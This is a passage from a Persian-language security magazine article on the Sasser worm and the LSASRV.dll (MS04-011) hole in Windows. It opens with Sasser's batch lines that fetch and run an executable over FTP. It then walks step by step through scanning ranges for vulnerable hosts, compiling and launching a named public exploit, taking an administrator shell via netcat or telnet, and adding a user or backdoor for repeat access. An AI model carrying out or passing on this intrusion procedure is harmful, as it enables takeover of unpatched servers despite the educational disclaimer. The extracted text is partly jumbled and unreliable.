echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on
ﺍﻟﺒﺘﻪ ﻻﺯﻡ ﺑﻪ ﺗﻮﺿﻴﺢ ﺍﺳﺖ ﮐﻪ ﻧﻮﻉ ﻫﺎﻱ ﺍﻭﻟﻴﻪ sasserﻗﺎﺩﺭ ﺑﻪ ﺣﻤﻠﻪ ﺑﻪ ﺍﻳﻦ ﺳﺮﻱ ﺍﺯ IPﻫﺎ
ﻧﺒﻮﺩﻧﺪ
127.0.0.1 •
10.x.x.x •
192.168.x.x •
169.254.x.x •
ﻫﻨﻮﺯ ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﻋﻠﺖ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺑﻮﺩ ﺑﻪ ﻋﻠﺖ ﻣﺸﮑﻼﺕ ﻓﻨﻲ ﻳﺎ ﺗﺼﻤﻴﻢ
ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﮐﺮﻡ ﻣﺰﺑﻮﺭ ﺑﺮﺍﻱ ﺭﺩ ﮐﺮﺩﻥ IPﻫﺎﻱ ﻓﻮﻕ! ﻭﻟﻲ ﺑﻪ ﻫﺮ ﺟﻬﺖ ﺩﺭ ﻧﺴﺨﻪ ﻫﺎﻱ Sasser
NGﮐﻪ ﺷﺮﺣﻲ ﺍﺯ ﺁﻥ ﺭﺍ ﺩﺭ ﺑﺎﻻ ﻣﺸﺎﻫﺪﻩ ﮐﺮﺩﻳﺪ ﺑﻪ ﺗﻤﺎﻣﻲ IPﻫﺎﻱ ﻧﻔﻮﺫﭘﺬﻳﺮ ﺣﻤﻠﻪ ﻣﻲ ﮐﻨﻨﺪ.
ﻗﺎﺑﻞ ﺫﮐﺮ ﺍﺳﺖ sasserﺍﺯ ﻧﺴﺨﻪ ﻫﺎﻱ Aﺗﺎ Zﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭﺁﻣﺪ ﮐﻪ ﺑﺎ ﺩﺳﺘﮕﻴﺮﻱ ﻓﺮﺩ ﻧﻮﻳﺴﻨﺪﻩ
ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﺨﺎﺻﻲ ﺩﻳﮕﺮ ﺷﺮﻭﻉ ﺑﻪ ﻣﻨﺘﺸﺮ ﮐﺮﺩﻥ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺍﻳﻦ ﮐﺮﻡ ﻧﻤﻮﺩﻧﺪ ﺑﺎ ﺍﻳﻨﮑﻪ ﮐﺮﻡ
ﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﻫﻤﻴﻦ ﺣﻔﺮﻩ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻧﻤﻮﺩﻧﺪ ﻭ ﺩﺍﺭﺍﻱ Gnomeﮐﺪﻱ ﻣﺸﺎﺑﻪ ﺑﻪ
ﺧﺼﻮﺹ ﺑﺎ Worm.Win32.Sasser.Bﺑﻮﺩﻧﺪ ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺩﺍﻣﻨﻪ ﻧﻔﻮﺫ ﻭ ﺩﻳﮕﺮ ﻗﺎﺑﻠﻴﺖ ﻫﺎ
ﻭﻧﺤﻮﻩ ﭘﻨﻬﺎﻥ ﮐﺎﺭﻱ ﺗﻔﺎﻭﺕ ﻫﺎﻱ ﭼﺸﻤﮕﻴﺮﻱ ﺑﺎ ﭘﺪﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺷﺘﻨﺪ .
7 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻣﻘﺎﻟﻪ ﭘﺎﻳﻴﻦ ﺷﺮﺣﻲ ﺍﺳﺖ ﺑﺮ ﭼﮕﻮﻧﮕﻲ ﻧﻔﻮﺫ ﻣﺮﺣﻠﻪ ﺑﻪ ﻣﺮﺣﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﭘﭻ ﻧﺸﺪﻩ ﺫﮐﺮ
ﺷﺪﻩ ﺑﺎﻻ ﮐﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻣﻲ ﺭﻭﺩ ﻛﻪ ﺑﻪ ﻋﻠﺖ ﺟﺪﻳﺪ ﺑﻮﺩﻥ ﺍﻳﻦ ﺣﻔﺮﻩ ﻭ ﻧﻴﺰ ﺳﺴﺘﻲ ﻫﻤﻴﺸﮕﻲ ﻣﺪﻳﺮﺍﻥ
ﺷﺒﮑﻪ ﺑﺮﺍﻱ ﺑﻪ ﺭﻭﺯ ﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺧﻮﺩ
ﻣﻴﺰﺍﻥ ﺣﻤﻼﺕ ﺑﺎ ﺍﻳﻦ ﺣﻔﺮﻩ ﺑﺴﻴﺎﺭ ﺑﺎﻻ ﺑﺎﺷﺪ .ﺑﻪ ﺍﻳﻦ ﺳﺒﺐ ﺑﺮ ﺁﻥ ﺷﺪﻳﻢ ﮐﻪ ﻫﻢ ﺑﺎ ﻣﻌﺮﻓﻲ ﺍﻳﻦ ﺣﻔﺮﻩ
ﻭ ﻧﻴﺰ ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﮑﺮﺩ ﺁﻥ ﻭﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﺭﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺧﻄﺮ ﺍﻳﻦ ﻧﻮﻉ ﺍﺯ
ﺣﻤﻼﺕ ﺭﺍ ﮔﻮﺷﺰﺩ ﮐﻨﻴﻢ .ﻟﺬﺍ ﻣﻄﺎﻟﺐ ﮔﻔﺘﻪ ﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺻﺮﻓﺎ ﺟﻨﺒﻪ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﺩ ﻭ ﻫﺮ ﮔﻮﻧﻪ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺫﻳﻞ ﺑﺮ ﻋﻬﺪﻩ ﺧﻮﺩ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ ﻭﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻭ ﻫﻤﭽﻨﻴﻨﻦ
ﻣﺪﻳﺮﻳﺖ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﻫﻴﭻ ﮔﻮﻧﻪ ﻣﺴﻮﻟﻴﺘﻲ ﺭﺍ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻧﻤﻲ ﭘﺬﻳﺮﻧﺪ .
8 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
2: nc11nt
http://www.atstake.com
ﺗﺬﮐﺮ :ﺗﻤﺎﻣﻲ ﻋﻤﻠﻴﺎﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﻓﺮﺿﻲ ﺑﻮﺩﻩ ﻭ ﺑﻪ ﻣﻨﻈﻮﺭ ﻧﻤﺎﻳﺶ
ﻋﻤﻠﻴﺎﺕ ﺗﻬﻴﻪ ﮔﺮﺩﻳﺪﻩ ﺍﺳﺖ ﻭ IPﻫﺎ ﺑﺮﺍﻱ ﻳﮏ ﺷﺒﮑﻪ LANﺧﺼﻮﺻﻲ ﻣﻲ ﺑﺎﺷﺪ
ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ IPﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺑﺎ ﺩﺳﺘﻮﺭ Ipconfigﺩﺭ ﺷﺒﮑﻪ ﻣﺸﺨﺺ ﮐﻨﻴﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﭘﻴﺪﺍ
ﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺭﻭﺷﻦ ﺍﺯ nmapﺑﺎ ﺳﻮﻳﭻ –sPﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻴﻢ )ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ
ﻃﻮﻻﻧﻲ ﺷﺪﻥ ﻣﻘﺎﻟﻪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻗﺴﻤﺖ ﺍﺯ ﻣﻘﺎﻟﻪ ﺣﻔﺮﻩ RPCﻭ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ، IIS
ﺩﺭ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﭘﺲ ﺍﺯ ﭘﻴﺪﺍ ﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ
ﺩﺍﺷﺘﻦ Bugﻣﻮﺭﺩ ﻧﻈﺮ ﭼﮏ ﮐﻨﻴﺪ
ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻓﻘﻂ ﻳﮏ ﻫﺪﻑ ﻣﻮﺭﺩ ﻧﻈﺮ ﺷﻤﺎ ﻣﻲ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﻮﺭ ﮐﻨﻴﺪ ﺁﻧﮕﺎ ﻩ ﺑﺎ
ﺗﺴﺖ ﻣﺴﺘﻘﻴﻢ Exploitﺑﺮ ﺭﻭﻱ ﺁﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻭﺟﻮﺩ ﺣﻔﺮﻩ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺁﮔﺎﻩ ﺷﻮﻳﺪ ﻭﻟﻲ ﺍﮔﺮ
ﺷﻤﺎ ﻗﺼﺪ ﭼﮏ ﮐﺮﺩﻥ ﻳﮏ Range Ipﺭﺍ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺩﺍﺭﻳﺪ ﺗﺴﺖ
ﺗﮏ ﺗﮏ ﺁﻧﻬﺎ ﺑﺎ Exploitﮐﺎﺭ ﺧﺴﺘﻪ ﮐﻨﻨﺪﻩ ﺍﻱ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ .ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ
GFI Languard Security Scanner v5ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺍﺑﺰﺍﺭ ﺍﺳﮑﻨﺮ ﺑﺴﻴﺎﺭ ﭘﺮﻗﺪﺭﺗﻲ
ﻫﺴﺖ ﮐﻪ ﻧﻪ ﺗﻨﻬﺎ ﺍﻳﻦ ﺣﻔﺮﻩ ﺧﺎﺹ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺩﺭ ﮐﻤﺘﺮﻳﻦ ﺯﻣﺎﻥ ﭼﮏ ﻣﻲ ﮐﻨﺪ ﺑﻠﮑﻪ ﺗﻤﺎﻣﻲ ﺣﻔﺮﻩ
ﻫﺎﻱ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺗﺎ ﺍﻳﻦ ﺗﺎﺭﻳﺦ ﺭﺍ ﻫﻢ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺪﺍ ﻣﻲ ﻛﻨﺪ ﻭ ﺣﺘﻤﺎ ﺷﻤﺎ ﺣﻔﺮﻩ ﻫﺎﻱ ﺑﺴﻴﺎﺭ
ﺩﻳﮕﺮﻱ ﺭﺍ ﻫﻢ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﮐﻨﻴﺪ ﻭﻟﻲ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﻣﻘﺪﺍﺭﻱ ﻧﻴﺎﺯ ﺑﻪ ﺁﺷﻨﺎﻳﻲ ﻗﺒﻠﻲ ﺑﻪ ﭼﮕﻮﻧﮕﻲ
9 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﭘﺲ ﻣﻦ ﺑﺮﺍﻱ ﺷﻤﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺭﺍ ﮐﻪ ﺷﺮﮐﺖ Foundstoneﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺧﺎﺹ ﺗﻬﻴﻪ ﮐﺮﺩﻩ
ﺍﺳﺖ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﺑﺴﻴﺎﺭ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺗﺮ ﺍﺯ GFIﻣﻲ ﺑﺎﺷﺪ ﻭﻟﻲ ﻣﻦ
ﺑﺮﺍﻱ ﺣﺮﻓﻪ ﺍﻱ ﻫﺎ ﻫﻤﺎﻥ GFIﺭﺍ ﺗﻮﺻﻴﻪ ﻣﻲ ﮐﻨﻢ ) ﺣﺘﻤﺎ ﺑﻪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﻣﻦ ﺗﻮﺟﻪ ﮐﻨﻴﺪ(
10 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﺑﻪ ﺷﮑﻞ ﺯﻳﺮ ﺗﻮﺟﻪ ﮐﻨﻴﺪ )ﻧﺮ ﺍﻓﺰﺍﺭ DDSScanﺍﺯ ﺷﺮﮐﺖ ( Foundstone
ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﺍﺑﺘﺪﺍ ﺩﺭ ﻗﺴﻤﺖ Start ipﻭ End Ipﺣﻮﺯﻩ ﺍﺳﮑﻦ ﺭﺍ ﻣﺸﺨﺺ
ﮐﻨﻴﺪ ﺳﭙﺲ ﺑﺎ ﺯﺩﻥ ﻓﻠﺶ ﻣﻘﺎﺑﻞ ﺁﻥ ﺣﻮﺯﻩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﮐﻨﻴﺪ ﻭ ﺍﺳﮑﻦ ﺭﺍ ﺷﺮﻭﻉ ﮐﻨﻴﺪ.
ﻧﺘﺎﻳﺞ ﺑﻪ ﺳﺮﻋﺖ ﻣﺸﺨﺺ ﻣﻲ ﺷﻮﻧﺪ .ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻗﺴﻤﺖ Statusﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ
ﭘﺬﻳﺮ ﻭ ﻏﻴﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﺍﻟﺒﺘﻪ ﺑﺎ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﻳﮏ ﺗﮏ Ipﻳﺎ Host nameﺩﺭ
ﻗﺴﻤﺖ ﺑﺎﻻﻱ ﺍﻳﻦ ﺑﺨﺶ ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻓﻘﻂ ﻳﮏ ﻫﺪﻑ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ Bugﺗﺴﺖ
ﮐﻨﻴﺪ .
11 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﺗﺬﮐﺮ IP :ﻫﺎﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﺩﺭﺗﺼﺎﻭﻳﺮ ﺯﻳﺮﻣﺮﺑﻮﻁ ﺑﻪ ﻳﮏ ﺷﺒﮑﻪ ﺩﺍﺧﻠﻲ ﻣﻲ ﺑﺎﺷﺪ ﻭﺻﺮﻓﺎ
ﺟﻬﺖ ﺁﻣﻮﺯﺵ ﺩﺭ ﺩﺍﺧﻞ ﻳﮏ ﺷﺒﮑﻪ Virtualﺗﺴﺖ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﮑﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻼ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺑﺎﺷﺪ .
:۲ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ Exploitﺭﺍ ﺑﻪ ﺳﺮﻭﺭ ﻫﺪﻑ ﺗﺰﺭﻳﻖ ﻣﻲ ﮐﻨﻴﻢ ) ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ sourceﺍﻳﻦ
Exploitﺭﺍ ﺑﺎ ﺑﺮﻧﺎﻣﻪ Lcc Win 32ﮐﺎﻣﭙﺎﻳﻞ ﮐﻨﻴﺪ(.
12 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
HOD-ms04011-lsasrv- ﺗﻮﺟﻪ :ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺖ ﺩﺭﺩ ﺑﻪ ﺧﺎﻃﺮ ﺍﻳﻦ ﺍﺳﻢ ﻃﻮﻻﻧﻲ
expl.exeﻣﻦ ﻧﺎﻡ ﺍﻳﻦ Exploitﺭﺍ ﺑﻪ lss.exeﺗﻐﻴﻴﺮ ﻧﺎﻡ ﺩﺍﺩﻡ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺷﻤﺎ ﻫﻢ ﻗﺒﻞ
ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﮐﺴﭙﻠﻮﻳﺖ ﺍﻳﻦ ﮐﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ .
ﻭ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﮑﻪ Exploitﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺑﻪ ﻫﺪﻑ ﻭﺻﻞ ﺷﺪ ﻭ ﭘﻴﻐﺎﻡ Attacking … OKﺭﺍ ﻣﺸﺎﻫﺪﻩ
ﮐﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﮑﻲ ﺍﺯ ﺩﻭ ﺭﺍﻩ ﺯﻳﺮ ﺑﻪ Shell Accountﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍﮐﻨﻴﺪ
ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘﻮﺭﺕ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﻭﻟﻲ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﮑﺘﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﮐﻪ
ﺍﮔﺮ ﭘﻮﺭﺕ ﻫﺎﻱ ﻣﻌﺮﻭﻓﻲ ﻣﺜﻞ ۸۰ﻳﺎ ۲۳ﻳﺎ ﭘﻮﺭﺕ ﻫﺎﻳﻲ ﺭﺍ ﮐﻪ ﺑﻪ ﻃﻮﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ ﻳﮏ ﺳﺮﻱ
Protocolﻫﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﮐﻨﻨﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﮐﻨﻴﺪ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻫﺴﺖ ﮐﻪ ﺑﺎﻋﺚ ﺗﺪﺍﺧﻞ ﺩﺭ ﺍﺟﺮﺍﻱ
13 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
Exploitﺷﻮﺩ ﻭ ﺷﻤﺎ ﺑﺎ ﺷﮑﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﭘﺲ ﺑﻬﺘﺮ ﺍﺳﺖ ﭘﻮﺭﺕ ﻫﺎﻱ ﻏﻴﺮ ﻣﻌﻤﻮﻟﻲ ﻣﺜﻞ
- ۶۶۶۹ –۴۴۴۴۴ﻳﺎ ﻫﺮ ﭘﻮﺭﺕ ﺩﻟﺨﻮﺍﻩ ﺩﻳﮕﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ .
ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﮐﻪ ﭘﻮﺭﺕ ۵۰۰۰ﺑﻪ ﺣﺎﻟﺖ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﮐﻪ
ﺑﺎ ﺑﺮﮔﺸﺘﻦ ﺟﻮﺍﺏ Exploitﺷﻞ ﺑﺮﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﭘﻮﺭﺕ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﻴﺴﺘﻢ ﻫﺪﻑ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﺪ
ﺏ :ﺭﺍﻩ ﺩﻭﻡ ﮐﻪ ﺧﻮﺩ ﻣﻦ ﺁﻥ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ Telnetﻣﻲ ﺑﺎﺷﺪ ﺯﻳﺮﺍ Telnet
ﺩﺍﺭﺍﻱ ﺳﺮﻋﺖ ﺑﻴﺸﺘﺮﻱ ﺍﺯ Netcatﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﺍﺳﺖ .ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ
ﺣﺎﻟﺖ ) VVV( very very verbosﺩﺭ netcatﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ .ﺍﻧﺘﺨﺎﺏ ﻫﺮ ﻳﮏ ﺍﺯ ﺩﻭ ﺭﺍﻩ
ﺑﺎﻻ ﺑﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ.
:۳ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻦ ﺷﻞ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻧﺎﻣﻪ Telnetﺑﻪ ﺩﺳﺖ ﮔﺮﻓﺘﻢ ﻭ ﺑﺎ ﺩﺳﺘﻮﺭ ipconfig
ﻣﻄﻤﺌﻦ ﺷﺪﻡ ﮐﻪ ﻣﻦ ﺍﻻﻥ ﺩﺍﺭﺍﻱ ipﺑﻪ ﺷﻤﺎﺭﻩ 217.218.13.173ﻫﺴﺘﻢ ﺩﺭ ﻭﺍﻗﻊ ﻣﻦ ﻳﮑﻲ ﺍﺯ
ﻳﻮﺯﺭ ﻫﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺎ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺷﺪﻡ .ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺑﺎ ﺯﺩﻥ
ﻳﮏ ﻣﻴﻞ ﺑﻪ ﻣﺪﻳﺮ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ Bugﺑﺎﺧﺒﺮ ﮐﻨﻴﺪ
14 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
:۴ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻘﺎﻟﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺩﺳﺖ ﺷﻤﺎﺳﺖ ﻭ ﺍﺯ ﻧﻈﺮ ﻋﻤﻠﻲ ﺍﻻﻥ ﻫﺮ ﮐﺎﺭﻱ ﻣﻲ ﺗﻮﺍﻧﻴﺪ
ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺍﺧﻼﻗﻲ ﻣﺤﺪﻭﺩﻳﺖ ﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﺍﻳﻨﺠﺎ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺭﺩ ﻭ
ﺑﺪﻝ ﮐﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﻫﺪﻑ ﺍﺯ ﻃﺮﻳﻖ TFTPﻳﺎ ﺑﺎ Snifffﮐﺮﺩﻥ ﺩﺍﺩﻩ ﻫﺎ ﻭ ﻳﺎ ﻫﺮ ﮐﺎﺭ ﺩﻳﮕﺮﻱ ﺩﺭ
ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ .ﻭﻟﻲ ﻣﻦ ﺩﺭ ﺍﺩﺍﻣﻪ ﻓﻘﻂ ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﮐﺎﺭﺑﺮﺍﻥ ﻳﮏ ﺍﺯ ﮐﺎﺭﻫﻬﺎﻱ ﺭﺍ ﮐﻪ ﻣﻲ ﺳﺮﻭﺭ
ﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ ﺑﻪ ﺷﻤﺎ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﻢ ﻭ ﺁﻥ ﺍﻳﺠﺎﺩ ﻳﮏ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺳﺖ ﮐﻪ ﺑﺮﺍﻱ ﺩﻓﻌﺎﺕ ﺑﻌﺪﻱ ﺑﺮﺍ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﺠﺪﺩ
Exploitﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻟﺒﺘﻪ ﺑﺎ netcatﻫﻢ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﺪﻑ ﻳﮏ BackDoorﺍﻳﺠﺎﺩ
